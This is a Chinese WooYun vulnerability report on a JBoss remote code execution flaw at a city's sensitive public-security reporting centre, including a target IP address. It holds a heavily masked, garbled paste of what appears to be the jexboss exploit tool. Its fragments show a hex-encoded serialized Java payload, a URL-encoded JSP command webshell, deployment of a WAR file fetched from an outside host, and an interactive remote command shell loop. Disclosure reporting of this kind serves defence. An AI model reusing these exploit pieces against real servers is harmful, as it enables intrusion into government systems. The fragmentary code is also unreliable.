乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-07: 细节已通知厂商并且等待厂商处理中 2015-05-07: 厂商已经确认,细节仅向厂商公开 2015-05-17: 细节向核心白帽子及相关领域专家公开 2015-05-27: 细节向普通白帽子公开 2015-06-06: 细节向实习白帽子公开 2015-06-21: 细节向公众公开
某市敏感单位网络报*中心JBoss远程代码执行漏洞
1.http://**.**.**2.http://**.**.**/invoker/JMXInvokerServlet_3.://**.**.**//118.192.4.79:8888/</code>_*****, 6 - Remote Comman**********到的poc&l**********lib, sys, ur**********mport u********************x1b[91m**********\033[31**********\033[94**********;\033[3**********\033[1m**********9;\033[**********\033[0m********************st(ur*****4.://**.**.**//")_*****: #foi forne**********].split(&quo**********lse**********.split(&quo********** **********ocol(u*****5.://**.**.**//")_*****== "**********"ht**********lse**********"ht********************rt(ur**********.split(&qu**********token)**********urn to**********l) == "**********eturn**********lse**********eturn********** **********ection**********l) == "**********nection(getHost(**********lse**********ection(getHost(u********** ********************ully(url**********esult**********e.slee**********getConne**********"GET&q**********nn.getresp**********result********** conn.********** time.**********= getConn**********t("GET&**********conn.getres********** conn.**********urn re********************Vul(u********** **********Checking Host: ********** **********tmlAdaptor?action=inspectMBean&am********** : "/web-con**********ot; : "/invoker********************n path********** **********; * Checking %s:**********= getConn**********t("HEAD**********onn.getrespo**********== 200 or pa**********quot;[ VULNERAB********** GREEN + &qu********** conn.********** exc**********rred while contaction th********** path[********** **********urn ********************it(url,********** **********ry: tested and wor********** tested and wor********** tested a**********ry: tested and wor********** ********** exploit code to %s**********ult **********t;jmx-cons**********mxConsoleFile**********200 and res**********oitJmxConsole**********uot;web-co**********oitWebConso**********JMXInvokerSe**********MXInvokerFile********************200 or re**********yed code! Starting comman**********_http(u**********lse**********w automatically. Exploitation**********ing for 7 seconds**********e.slee********************p(url, **********ot; or type == &qu**********bossass/jbos**********JMXInvokerSe**********invoker/shelli********************tConnec**********uot;GET&qu**********n.cl**********sleep**********"**********cle**********- - - LOL - - - - - - - - -**********uot;+url+&quo**********nt" : &quo**********#039;cat /etc/issue&**********getConne**********({"ppp&**********ot;, path+cmd, **********esponse().read().spl**********nt r********** **********hil**********ands or \"exit**********quot;Shell&g**********print********** "ex********** br**********getConne**********({"ppp&**********ot;, path+cmd, **********conn.get**********.status **********cting the commando she********** conn.********** co**********t = &qu********** **********d().split("********** exc**********cting the commando she**********ion occurred process**********d \"%s\". " %********** print **********onn.c********************soleMainD**********nDepl**********n jboss5 (b**********ll in**********ole/Html*****6.://**.**.**//www.joaomatosf.com/rnp/jbossass.war"_*****r?action=invokeOp&n**********&methodIndex=1**********t will force the server ********** available on: **********tConnec**********t;HEAD"**********.getrespo**********n.cl**********quot;/jbossass/jb********************leFileRepo**********entFileRe**********d work in **********ot work i********** shel**********nsole/Htm**********%65%20%69%6D%70%6F%72**********%2C%6A%61%76%61%2E%69**********%69%66%20%28%72%65%71**********%74%65%72%28%22%70%70**********%20%72%65%71%75%65%73**********%73%65%72%2D%61%67%65**********%65%78%62%6F%73%73%22**********%20%3D%20%52%75%6E%74**********%28%29%2E%65%78%65%63**********%72%61%6D%65%74%65%72**********%49%6E%70%75%74%53%74**********%20%44%61%74%61%49%6E**********%74%49%6E%70%75%74%53**********%6E%67%20%64%69%73%72**********%65%28%29%3B%20%77%68**********%6E%75%6C%6C%20%29%20**********%64%69%73%72%29%3B%20**********4%4C%69%6E%65%28%29%3B********** **********action=invokeOpByName&**********;methodName=store&argTy**********a.lang.String&arg1=jbos**********.String&arg3="+jsp+"********** **********getConne**********uot;HEAD&quo**********nn.getresp**********onn.c**********l, "/jbossas********** **********erFileRepo**********work in j**********y, shell**********JMXInvok**********x72\x00\x29\x6f\x72\x6**********x6f\x63\x61\x74\x69\x6**********x65\x64\x49\x6e\x76\x6**********x41\x3e\xa4\xbe\x0c\x0**********xc1\xd0\x53\x87\x73\x7**********x67\x2e\x49\x6e\x74\x6**********x38\x02\x00\x01\x49\x0**********x6a\x61\x76\x61\x2e\x6**********x86\xac\x95\x1d\x0b\x9**********xe6\x73\x72\x00\x24\x6**********x6e\x76\x6f\x63\x61\x7**********x6c\x6c\x65\x64\x56\x6**********x99\x0c\x00\x00\x78\x7**********xed\x00\x05\x75\x72\x0**********x6e\x67\x2e\x4f\x62\x6**********x29\x6c\x02\x00\x00\x7**********x61\x76\x61\x78\x2e\x6**********x4f\x62\x6a\x65\x63\x7**********x15\xcf\x03\x00\x00\x7**********x61\x64\x6d\x69\x6e\x3**********x70\x6c\x6f\x79\x6d\x6**********x73\x69\x74\x6f\x72\x7**********x71\x00\x7e\x00\x00\x0**********x6c\x69\x6e\x76\x6f\x6**********x68\x65\x6c\x6c\x69\x6**********x73\x70\x74\x01\x79\x3**********x70\x6f\x72\x74\x3d\x2**********x2a\x2c\x6a\x61\x76\x6**********x72\x65\x3e\x3c\x25\x6**********x67\x65\x74\x50\x61\x7**********x70\x22\x29\x20\x21\x3**********x65\x71\x75\x65\x73\x7**********x28\x22\x75\x73\x65\x7**********x71\x75\x61\x6c\x73\x2**********x20\x29\x20\x7b\x20\x5**********x20\x52\x75\x6e\x74\x6**********x69\x6d\x65\x28\x29\x2**********x73\x74\x2e\x67\x65\x7**********x22\x70\x70\x70\x22\x2**********x75\x74\x53\x74\x72\x6**********x65\x77\x20\x44\x61\x7**********x61\x6d\x28\x70\x2e\x6**********x65\x61\x6d\x28\x29\x2**********x69\x73\x72\x20\x3d\x2**********x6e\x65\x28\x29\x3b\x2**********x73\x72\x20\x21\x3d\x2**********x75\x74\x2e\x70\x72\x6**********x3b\x20\x64\x69\x73\x7**********x64\x4c\x69\x6e\x65\x2**********x00\x11\x6a\x61\x76\x6**********x65\x61\x6e\xcd\x20\x7**********x05\x76\x61\x6c\x75\x6**********x61\x76\x61\x2e\x6c\x6**********xad\xd2\x56\xe7\xe9\x1**********x05\x74\x00\x10\x6a\x6**********x72\x69\x6e\x67\x71\x0**********x7e\x00\x0f\x74\x00\x0**********x87\x78\x77\x08\x00\x0**********x6f\x72\x67\x2e\x6a\x6**********x74\x69\x6f\x6e\x2e\x4**********x65\x79\xb8\xfb\x72\x8**********x6f\x72\x64\x69\x6e\x6**********;\x00\x04\x**********tConnec**********java-serialized-object; class=or**********t/html, image/gif, image**********nvoker/JMXInvokerServl**********conn.get**********respons**********lt == **********; Retryi**********onn.c**********/invoker/JMXInvokerServ**********= conn.ge**********= respon**********t("Failed**********esult**********n.cl**********ot;/shellinvoker/s********** **********soleInvok**********n jboss5 (b**********y, shell**********nsole/I*****7.://**.**.**//www.joaomatosf.com/rnp/jbossass.war"_*****;{:02x}".forma**********t;\\x&qu**********x05\x73\x72\x00\x2**********x2e\x63\x6f\x6e\x73\x6**********x52\x65\x6d\x6f\x74\x6**********x61\x74\x69\x6f\x6e\xe**********x4c\x00\x0a\x61\x63\x7**********x4c\x6a\x61\x76\x61\x2**********x67\x3b\x5b\x00\x06\x7**********x6a\x61\x76\x61\x2f\x6**********x3b\x5b\x00\x09\x73\x6**********x5b\x4c\x6a\x61\x76\x6**********x6e\x67\x3b\x4c\x00\x1**********x63\x74\x4e\x61\x6d\x6**********x6d\x61\x6e\x61\x67\x6**********x74\x4e\x61\x6d\x65\x3**********x79\x75\x72\x00\x13\x5**********x2e\x4f\x62\x6a\x65\x6**********x02\x00\x00\x78\x70\x0********** "\********** #**********f\x2f\x77\x77\x77\x2e\x**********x63\x6f\x6d\x2f\x72\x6**********3\x61\x73\x73\x********** **********x75\x72\x00\**********x2e\x6c\x61\x6e\x67\x2**********xe7\xe9\x1d\x7b\x47\x0**********x10\x6a\x61\x76\x61\x2**********x67\x73\x72\x00\x1b\x6**********x65\x6d\x65\x6e\x74\x2**********x0f\x03\xa7\x1b\xeb\x6**********x6a\x62\x6f\x73\x73\x2**********x76\x69\x63\x65\x3d\x4**********x6c\x6f\x79\x6**********tConnec**********-serialized-object; class=org.jbos**********t/html, image/gif, image**********/web-console/Invoker&**********conn.get**********respons**********lt == **********; Retryi**********onn.c**********uot;/web-console/Invo**********= conn.ge**********= respon**********n.cl********** "/jbossass******************** **********lea********** 'po**********('cl**********9;, 'nt'**********('cl********************Args(**********gs[1].count(********** host name or IP addre*****8.://**.**.**//&9.://**.**.**//%s"&*****== 1 and args[1].coun**********0, "**********lse**********;Parametro i********************ner(**********lea**********boss verify and EXplo********** **********ilho Matos Figueired**********[email protected] ********** **********/github.com/joaomato**********_____________________********************r()**********hon ve**********n_info[**********patible with versi**********un it with version**********ot; * Examp*****10.://**.**.**//site.com\n\n"+ENDC )_*****.exi********************ck ********** checkArg**********us =**********ys.arg**********us ==**********n * Error: %********** %s https://site.com.b**********xit(s**********us ==*****11.://**.**.**//&***************nerabi********** check********************exploi**********b-console", "**********200 or mapRe**********utomated exploitation via \"**********e a simple command shell to e**********ue only if you have**********O ? ").lower(**********oExploit********************e re**********().count(2**********ann**********ntially compromise**********- - - - - - - - - - - - - -**********Recommendat**********s and services that a********** rm web-conso********** rm http-invo********** rm jmx-conso**********x-invoker-adapto********** rm admin-con**********e proxy (eg. nginx********** only via reverse proxy (**********he directories \"deploy\&qu**********; Referenc*****12.://**.**.**//developer.jboss.org/wiki/SecureTheJmxConsole\n"_13.://**.**.**//issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"_***** "**********ble, discard thi**********- - - - - - - - - - - - - **********es().count**********t;\n\n * Res**********lnerable to bugs test********************os **********, suggestions, up*****14.://**.**.**//github.com/joaomatosf/jexboss\n"_*****oaomatosf@gm********************lt;/co*****
*****^**********cbc0874e5dd206861d11d2.png**********^安局网络报**********32318ed65ae07fd69eb13b.png*****
危害等级:高
漏洞Rank:10
确认时间:2015-05-07 16:22
验证确认所描述的问题,已通知其修复。
暂无